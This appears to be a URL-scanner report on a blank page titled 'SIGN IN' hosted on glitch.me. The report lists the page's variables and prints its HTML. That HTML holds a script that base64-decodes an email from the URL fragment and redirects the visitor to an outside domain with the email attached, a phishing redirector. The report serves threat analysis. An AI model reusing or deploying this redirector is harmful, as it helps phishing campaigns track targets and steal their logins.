- Scan ID:
- 36c7eb32-13dd-4263-a366-2ba01a5f583fFinished
- Submitted URL:
- https://heluniversalec.glitch.me/
- Report Finished:
Links · 0 found
The outgoing links identified from the page
JavaScript Variables · 5 found
Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope
Name | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
base64Decode | function |
hash | string |
Console log messages · 1 found
Messages logged to the web console
Type | Category | Log |
---|---|---|
error | network |
|
HTML
The raw HTML body of the page
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SIGN IN</title>
</head>
<body>
<script>
function base64Decode(str) {
try {
return decodeURIComponent(atob(str).split('').map(function(c) {
return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
}).join(''));
} catch (e) {
console.error('Invalid base64 string:', str);
return null;
}
}
var hash = window.location.hash;
if (hash !== "") {
hash = hash.substring(1); // Remove the '#' character
const email = base64Decode(hash);
if (email) {
window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
}
}
</script>
</body></html>